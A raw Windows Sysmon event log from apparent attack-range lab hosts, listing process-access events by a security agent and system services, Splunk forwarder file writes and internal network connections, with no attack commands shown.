12:20:22.618{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016004Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.607{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016003Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.579{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016002Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.571{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016001Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.564{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016000Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.555{E5A8D418-DC44-63C7-1C00-00000000B002}20203052C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132003D0) 10341000x800000000000000015999Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.553{E5A8D418-DC44-63C7-1C00-00000000B002}20203052C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132003D0) 10341000x800000000000000015998Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.551{E5A8D418-DC44-63C7-1C00-00000000B002}20203052C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132003D0) 10341000x800000000000000015997Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.549{E5A8D418-DC44-63C7-1C00-00000000B002}20203052C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132003D0) 10341000x800000000000000015996Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.546{E5A8D418-DC44-63C7-1C00-00000000B002}20203052C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132003D0) 23542300x800000000000000041298Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:23.557{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25B12B7ABA5D378088F74563BA2482BE,SHA256=E765D528A2E071CC22204F7B3C26CF446B2FBAF2F6F332012219815EA6BD614D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016027Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:23.404{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C45F712E808CB2F2039DC2C6E2CB4D58,SHA256=FFAD6D96BDFA9CA784304A27C3D0FBC7E25E3C81B367C80A3BF33987A8E19959,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041299Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:24.636{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40231073FDAC30DB3E664D537D53174F,SHA256=1686A8D14DB7E2B2484FFA00D6879ED375DA7E4D61387CFEA8753E5EB48E12E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016028Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:24.420{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AE1C0B185BD330737518B7EC0C5F0C0,SHA256=383C67CEA3FDAFE16B1E36D3E1F50E822F572378D33410A68BF21883FBA32C1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041300Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:25.728{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40F760050DEFDDE048E508CC9EE1EE67,SHA256=7FBB27E994298B67CC7969A992EAFFE3306D03FE677C4DC78FCF27023ADD353A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016034Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:25.671{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016033Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:25.671{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016032Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:25.670{E5A8D418-DC43-63C7-0B00-00000000B002}632680C:\Windows\system32\lsass.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016031Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:25.654{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1C00-00000000B002}2020C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000016030Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:24.004{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50077-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016029Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:25.504{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EC9983370CC5F81141DB864F65D57B3,SHA256=1B5E5167E93304ED72DC65937E6C8C9CB4224BC9C2E53471F50260E867DE7917,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041302Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:26.847{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA05A19C09ABC5FE8C682B879CC0241C,SHA256=EACE0CEA69D538C35A9C199E0FAC5FB9C25796C1C1E95B1A0BAB35D3DCA9BBE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016035Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:26.582{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14D2784E53E5F1E55913ECA7A7BFEAFB,SHA256=AD7044E1F15692BCD580A435C0629C5C3330AB8E5A892DA94964CC2B46839406,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041301Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:26.524{FE4C2B44-D9F5-63C7-1100-00000000AF02}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=1A6BB2A29C4B4BCDEB7967574BEA0288,SHA256=279B65B990390D063FBBF1442012A12D0A5A798220C56E2826880C86946C329D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041304Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:27.935{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0876545AD3C8F71F4FA8905CFD51573,SHA256=D82AA95E5B7F8D3FC40AFBA959AF038AE69216CAE828F89D7BA00895A2D10297,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016036Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:27.677{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2DCD7C81E3AFBB6416868E1749917F6,SHA256=E1988674866D1C60CF88C6286FDD89DD4E301CED5469A41E14389739A8B703E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041303Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:27.541{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016037Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:28.768{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BA7376460DD5967FF3DEF538D55521B,SHA256=89ED73C6B595B92315E584698BFDDE055CF4D29369375A5BEBE419FD4A70A928,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000041305Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:26.634{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56277-false10.0.1.12-8000- 23542300x800000000000000016065Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.939{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=6840D2DDC2F5136B98F0A179A2B7A240,SHA256=D11B6ABA69744F906537FFB9705D60E53EAA5BDB188365CED9C1674BBC630787,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016064Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.885{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E40D-63C7-F601-00000000B002}1896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016063Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.882{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016062Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.882{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016061Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.882{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016060Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.882{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016059Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 